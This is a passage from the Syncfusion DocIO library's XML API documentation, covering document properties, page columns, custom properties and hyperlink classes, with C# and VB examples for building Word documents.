            Gets or sets the category of the document.
            </summary>
            <value>The <b>string </b> that represents the document category.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.BytesCount">
            <summary>
            Gets the number of bytes in the document.
            </summary>
            <value>The <b>integer</b> that represents the number of bytes.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.LinesCount">
            <summary>
            Gets the number of lines in the document.
            </summary>
            <value>The <b>integer</b> that represents the lines count in the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.ParagraphCount">
            <summary>
            Gets the number of paragraphs in the document.
            </summary>
            <value>The <b>integer</b> that represents the paragraphs count in the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.SlideCount">
            <summary>
            Gets slide count in the document.
            </summary>
            <value>The <b>integer</b> that specifies the slide count in the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.NoteCount">
            <summary>
            Gets Note count in the document.
            </summary>
            <value>The <b>integer</b> that specifies the note count in the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.HiddenCount">
            <summary>
            Gets hidden count in the document.
            </summary>
            <value>The <b>integer</b> that specifies the hidden count in the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.Company">
            <summary>
            Gets or sets Company property in the document.
            </summary>
            <value>The <b>string</b> that specifies the company property.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.Manager">
            <summary>
            Gets or sets Manager property in the document.
            </summary>
            <value>The <b>string</b> that specifies the manager property.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.DocumentHash">
            <summary>
            Gets document hash
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BuiltinDocumentProperties.Item(Syncfusion.CompoundFile.DocIO.Native.PIDDSI)">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Column">
            <summary>
            Represents the page column in the Word document.
            </summary>
            <example>
            <para>The following code example demonstrates how to display contents in multiple columns.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add the section into Word document
                WSection section = document.AddSection() as WSection;
                //Add the column into the section
                Column column1 = new Column(document);
                column1.Width = 150;
                column1.Space = 20;
                section.Columns.Add(column1);
                //Add the column into the section
                Column column2 = new Column(document);
                column2.Width = 150;
                column2.Space = 20;
                section.Columns.Add(column2);
                //Add the column into the section
                Column column3 = new Column(document);
                column3.Width = 150;
                column3.Space = 20;
                section.Columns.Add(column3);
                //Add a paragraph to created section
                IWParagraph paragraph = section.AddParagraph();
                //Add a paragraph to created section
                paragraph = section.AddParagraph();
                string paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak);
                //Add a paragraph to created section
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak);
                //Add a paragraph to created section
                paragraph = section.AddParagraph();
                //Append the text to the created paragraph
                paragraph.AppendText(paraText);
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add the section into Word document
                Dim section As WSection = TryCast(document.AddSection(), WSection)
                'Add the column into the section
                Dim column1 As New Column(document)
                column1.Width = 150
                column1.Space = 20
                section.Columns.Add(column1)
                'Add the column into the section
                Dim column2 As New Column(document)
                column2.Width = 150
                column2.Space = 20
                section.Columns.Add(column2)
                'Add the column into the section
                Dim column3 As New Column(document)
                column3.Width = 150
                column3.Space = 20
                section.Columns.Add(column3)
                'Add a paragraph to created section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add a paragraph to created section
                paragraph = section.AddParagraph()
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak)
                'Add a paragraph to created section
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Add the column breaks
                paragraph.AppendBreak(BreakType.ColumnBreak)
                'Add a paragraph to created section
                paragraph = section.AddParagraph()
                'Append the text to the created paragraph
                paragraph.AppendText(paraText)
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Column.m_fWidth">
            <summary>
            Column width.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Column.m_fSpacing">
            <summary>
            Spacing between column.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Column.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initialize a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Column"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Column.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Column.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Column.Clone">
            <summary>
            Clones itself.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Column.Width">
            <summary>
            Gets or sets column width measured in points.
            </summary>
            <value>The <b>float</b> that represents the width of the column.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Column.Space">
            <summary>
            Gets or sets spacing between current and next column measured in points.
            </summary>
            <value>The <b>float</b> that represents  the space between the columns.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CustomDocumentProperties">
            <summary>
            Represents the custom document properties for the specified document.
            </summary>
            <example>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                //Add the new custom property Typist with value
                document.CustomDocumentProperties.Add("Typist", "Andrew");
                //Add the new custom property Publisher with value
                document.CustomDocumentProperties.Add("Publisher", "Stephen");
                //Add the new custom property Recorded by with value
                document.CustomDocumentProperties.Add("Recorded by", "Harry");
                //Add the new custom property Recorded date with value
                document.CustomDocumentProperties.Add("Recorded date", new DateTime(2015, 2, 23));
                //Save and close the Word document
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                'Add the new custom property Typist with value
                document.CustomDocumentProperties.Add("Typist", "Andrew")
                'Add the new custom property Publisher with value
                document.CustomDocumentProperties.Add("Publisher", "Stephen")
                'Add the new custom property Recorded by with value
                document.CustomDocumentProperties.Add("Recorded by", "Harry")
                'Add the new custom property Recorded date with value
                document.CustomDocumentProperties.Add("Recorded date", New DateTime(2015, 2, 23))
                'Save and close the Word document
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CustomDocumentProperties.m_customList">
            <summary>
            Sorted list of properties
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CustomDocumentProperties.#ctor">
            <summary>
            Initialize
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CustomDocumentProperties.#ctor(System.Int32)">
            <summary>
            Initialize
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CustomDocumentProperties.Add(System.String,System.Object)">
            <summary>
            Adds the new custom document property with specified name and its value.
            </summary>
            <param name="name">A <c>String</c> that represents the name of the property to add.</param>
            <param name="value">The value for the property.</param>
            <returns>The new <see cref="T:Syncfusion.DocIO.DLS.DocumentProperty"/> this method creates.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CustomDocumentProperties.Remove(System.String)">
            <summary>
            Removes the specified custom property from the document.
            </summary>
            <param name="name">A <c>String</c> that represents the name of the property.</param>
            <exception cref="T:System.ArgumentNullException"> The specified property is not present in the document.</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CustomDocumentProperties.Clone">
            <summary>
            Creates a duplicate copy of this <see cref="T:Syncfusion.DocIO.DLS.CustomDocumentProperties"/>
            </summary>
            <returns>The newly created duplicate copy of the current <c>CustomDocumentProperties</c> instance</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CustomDocumentProperties.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CustomDocumentProperties.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CustomDocumentProperties.ReadProperty(Syncfusion.DocIO.DLS.XML.XDLSReader)">
            <summary>
            Reads point and it's type from XML.
            </summary>
            <param name="reader">Reader object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CustomDocumentProperties.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CustomDocumentProperties.CustomHash">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CustomDocumentProperties.Item(System.String)">
            <summary>
            Gets the custom property by specified name. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CustomDocumentProperties.Item(System.Int32)">
            <summary>
            Gets the custom property by specified index. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CustomDocumentProperties.Count">
            <summary>
            Gets the total number of custom properties in the document. Read-only.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocumentProperty">
            <summary>
            Represents document property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentProperty.DEF_START_ID2">
            <summary>
            Start index for Id2 PropVariant property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentProperty.DEF_FILE_TIME_START_YEAR">
            <summary>
            Start year for FILETIME structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentProperty.m_propertyId">
            <summary>
            Property id.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentProperty.m_strName">
            <summary>
            Property name.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentProperty.m_value">
            <summary>
            Property value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentProperty.m_type">
            <summary>
            Property type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentProperty.m_strLinkSource">
            <summary>
            The source of a linked custom document property. Read/write String.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocumentProperty.m_bFlags">
            <summary>
            True if the value of the custom document property is linked to the content
            of the container document. False if the value is static. Read/write Boolean.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.#ctor(System.String,System.Object)">
            <summary>
            Initializes new instance of the class.
            </summary>
            <param name="strName">Property name.</param>
            <param name="value">Property value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.#ctor(System.String,System.Object,Syncfusion.CompoundFile.DocIO.PropertyType)">
            <summary>
            Initializes new instance of the class.
            </summary>
            <param name="strName">Property name.</param>
            <param name="value">Property value.</param>
            <param name="type">Property type</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.#ctor(Syncfusion.CompoundFile.DocIO.BuiltInProperty,System.Object)">
            <summary>
            Initializes new instance of the class.
            </summary>
            <param name="propertyId">Property id.</param>
            <param name="value">Property value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.#ctor(Syncfusion.CompoundFile.DocIO.Net.IPropertyData,System.Boolean)">
            <summary>
            Initializes new instance of the document property.
            </summary>
            <param name="variant">Variant that contains property data.</param>
            <param name="bSummary">
            Indicates whether property is from document summary or not (only for
            built-int properties).</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.DetectStringType(System.String)">
            <summary>
            Detects type of the string.
            </summary>
            <param name="value">String value to check.</param>
            <returns>Detected string type.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.ToBool">
            <summary>
            Returns the boolean value for the property.
            </summary>
            <returns><b>True</b> if the value exists, otherwise <b>false</b>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.ToDateTime">
            <summary>
            Convert the object in DateTime.
            </summary>
            <returns>The converted <see cref="T:System.DateTime"/> value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.ToFloat">
            <summary>
            Convert the object in float value.
            </summary>
            <returns>The converted float value of the property.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.ToDouble">
            <summary>
            Convert the object in double.
            </summary>
            <returns>The converted double value of the property.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.ToInt">
            <summary>
            Convert the object in Int value.
            </summary>
            <returns>The converted integer value of the property.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.ToString">
            <summary>
            Returns a <see cref="T:System.String"/> that represents the current <see cref="T:System.Object"/>.
            </summary>
            <returns>
            A <see cref="T:System.String"/> that represents the current <see cref="T:System.Object"/>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.ToByteArray">
            <summary>
            Convert the object as byte array.
            </summary>
            <returns>The <see cref="T:System.Byte"/> array.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.ToClipData">
            <summary>
            Gets the clip data.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.FillPropVariant(Syncfusion.CompoundFile.DocIO.Net.IPropertyData,System.Int32)">
            <summary>
            Copies document property data into PropVariant.
            </summary>
            <param name="variant">Destination object.</param>
            <param name="iPropertyId">PropertyId for custom properties.</param>
            <returns>True if was able to fill variant; false otherwise.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.CorrectIndex(Syncfusion.CompoundFile.DocIO.BuiltInProperty,System.Boolean@)">
            <summary>
            Converts propertyId into correct index.
            </summary>
            <param name="propertyId">PropertyId to convert.</param>
            <param name="bSummary">[out] Indicates whether this is document summary property of simply document property.</param>
            <returns>Correct property index.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.DetectPropertyType">
            <summary>
            Tries to detect and set property type.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.SetLinkSource(Syncfusion.CompoundFile.DocIO.Net.IPropertyData)">
            <summary>
            Sets value of LinkSource property.
            </summary>
            <param name="variant">Variant that contains value to set.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.Clone">
            <summary>
            Creates a new object that is a copy of the current instance.
            </summary>
            <returns>A new object that is a copy of this instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.CloneValue">
            <summary>
            Creates copy of the internal value.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.DocumentProperty.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.IsBuiltIn">
            <summary>
            Indicates whether property is built-in. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.PropertyId">
            <summary>
            Returns / sets property id for built-in properties.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.Name">
            <summary>
            Gets the property name. Read-only.
            </summary>
            <value>The <b>string</b> that represents the property name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.Value">
            <summary>
            Gets or sets the property value.
            </summary>
            <value>An object that specifies the property value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.ValueType">
            <summary>
            Gets the type of the value. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.PropertyValueType"/> member that specifies the type of the value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.Boolean">
            <summary>
            Gets / sets boolean value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.Integer">
            <summary>
            Gets / sets integer value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.Int32">
            <summary>
            Gets / sets 4-bytes signed integer value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.Double">
            <summary>
            Gets / sets double value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.Text">
            <summary>
            Gets / sets string value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.DateTime">
            <summary>
            Gets / sets DateTime value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.TimeSpan">
            <summary>
            Gets / sets TimeSpan value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.Blob">
            <summary>
            Gets / sets Blob value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.ClipboardData">
            <summary>
            Gets or sets clipboard data value.
            </summary>
            <value>The <see cref="!:Syncfusion.CompoundFile.DocIO.Net.ClipboardData"/> that specifies the clipboard data.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.StringArray">
            <summary>
            Gets / sets array of strings.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.ObjectArray">
            <summary>
            Gets / sets array of objects. Supported object types are string and Int32.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.PropertyType">
            <summary>
            Gets / sets document property type.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.LinkSource">
            <summary>
            Returns or sets the source of a linked custom document property. Read/write String.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.LinkToContent">
            <summary>
            True if the value of the custom document property is linked to the content of the container document. False if the value is static. Read/write Boolean.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.DocumentProperty.InternalName">
            <summary>
            Internal name of the document property.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Hyperlink">
            <summary>
            Represents the Hyperlink.
            </summary>
            <example>
            <para>The following code example demonstrates how to insert a web link.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Web Hyperlink:  ");
                paragraph = section.AddParagraph();
                //Append web hyperlink to the paragraph
                IWField field = paragraph.AppendHyperlink("http://www.syncfusion.com", "Syncfusion", HyperlinkType.WebLink);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Web Hyperlink:  ")
                paragraph = section.AddParagraph()
                'Append web hyperlink to the paragraph
                Dim field As IWField = paragraph.AppendHyperlink("http://www.syncfusion.com", "Syncfusion", HyperlinkType.WebLink)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            <para>The following code example demonstrates how to add an email link.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Email hyperlink: ");
                paragraph = section.AddParagraph();
                //Append Email hyperlink to the paragraph
                paragraph.AppendHyperlink("mailto:john@gmail.com","John" , HyperlinkType.EMailLink);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Email hyperlink: ")
                paragraph = section.AddParagraph()
                'Append Email hyperlink to the paragraph
                paragraph.AppendHyperlink("mailto:john@gmail.com", "John", HyperlinkType.EMailLink)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            <para>The following code example demonstrates how to add a file hyperlink.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("File Hyperlinks: ");
                paragraph = section.AddParagraph();
                //Append hyperlink field to the paragraph
                paragraph.AppendHyperlink(@"D:\Template.docx","File", HyperlinkType.FileLink);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("File Hyperlinks: ")
                paragraph = section.AddParagraph()
                'Append hyperlink field to the paragraph
                paragraph.AppendHyperlink("D:\Template.docx", "File", HyperlinkType.FileLink)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            <para>The following code example demonstrates how to add a bookmark hyperlink.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Create new Bookmark
                paragraph.AppendBookmarkStart("Introduction");
                paragraph.AppendText("Hyperlink");
                paragraph.AppendBookmarkEnd("Introduction");
                paragraph.AppendText("\nA hyperlink is a reference or navigation element in a document to another section of the same document or to another document that may be on or part of a (different) domain.");
                paragraph = section.AddParagraph();
                paragraph.AppendText("Bookmark Hyperlink: ");
                paragraph = section.AddParagraph();
                //Append Bookmark hyperlink to the paragraph
                paragraph.AppendHyperlink("Introduction", "Bookmark", HyperlinkType.Bookmark);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Create new Bookmark
                paragraph.AppendBookmarkStart("Introduction")
                paragraph.AppendText("Hyperlink")
                paragraph.AppendBookmarkEnd("Introduction")
                paragraph.AppendText(vbLf &amp; "A hyperlink is a reference or navigation element in a document to another section of the same document or to another document that may be on or part of a (different) domain.")
                paragraph = section.AddParagraph()
                paragraph.AppendText("Bookmark Hyperlink: ")
                paragraph = section.AddParagraph()
                'Append Bookmark hyperlink to the paragraph
                paragraph.AppendHyperlink("Introduction", "Bookmark", HyperlinkType.Bookmark)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            <para>The following code example demonstrates how to add image hyperlink.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Image Hyperlink");
                paragraph = section.AddParagraph();
                //Create a new image instance and load image 
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Append new image hyperlink to the paragraph
                paragraph.AppendHyperlink("http://www.syncfusion.com", picture, HyperlinkType.WebLink);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Image Hyperlink")
                paragraph = section.AddParagraph()
                'Create a new image instance and load image 
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Append new image hyperlink to the paragraph
                paragraph.AppendHyperlink("http://www.syncfusion.com", picture, HyperlinkType.WebLink)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Hyperlink.m_hyperlink">
            <summary>
            Hyperlink field
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Hyperlink.m_type">
            <summary>
            Type of the hyperlink
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Hyperlink.m_filePath">
            <summary>
            File path.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Hyperlink.m_uriPath">
            <summary>
            URL link.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Hyperlink.m_bookmark">
            <summary>
            Bookmark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Hyperlink.m_textToDisplay">
            <summary>
            Text which will be displayed on the place of hyperlink
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Hyperlink.m_picToDisplay">
            <summary>
            Hyperlink image
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Hyperlink.m_localReference">
            <summary>
            Local Reference 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.#ctor(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Hyperlink"/> class.
            </summary>
            <param name="hyperlink">The hyperlink.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.CheckHyperlink(Syncfusion.DocIO.DLS.WField)">
            <summary>
            Performs hyperlink field validation.
            </summary>
            <param name="field">The field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.Parse">
            <summary>
            Parses the hyperlink
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.UpdateTextToDisplay">
            <summary>
            Updates the text to display.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.SetImageToDisplay">
            <summary>
            Sets the image to display.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.RemoveHLItems(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Removes the hyperlink items.
            </summary>
            <param name="ownerPara">The owner paragraph.</param>
            <param name="itemIndex">Index of the item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Hyperlink.FindHyperlinkText(Syncfusion.DocIO.DLS.WParagraph@)">
            <summary>
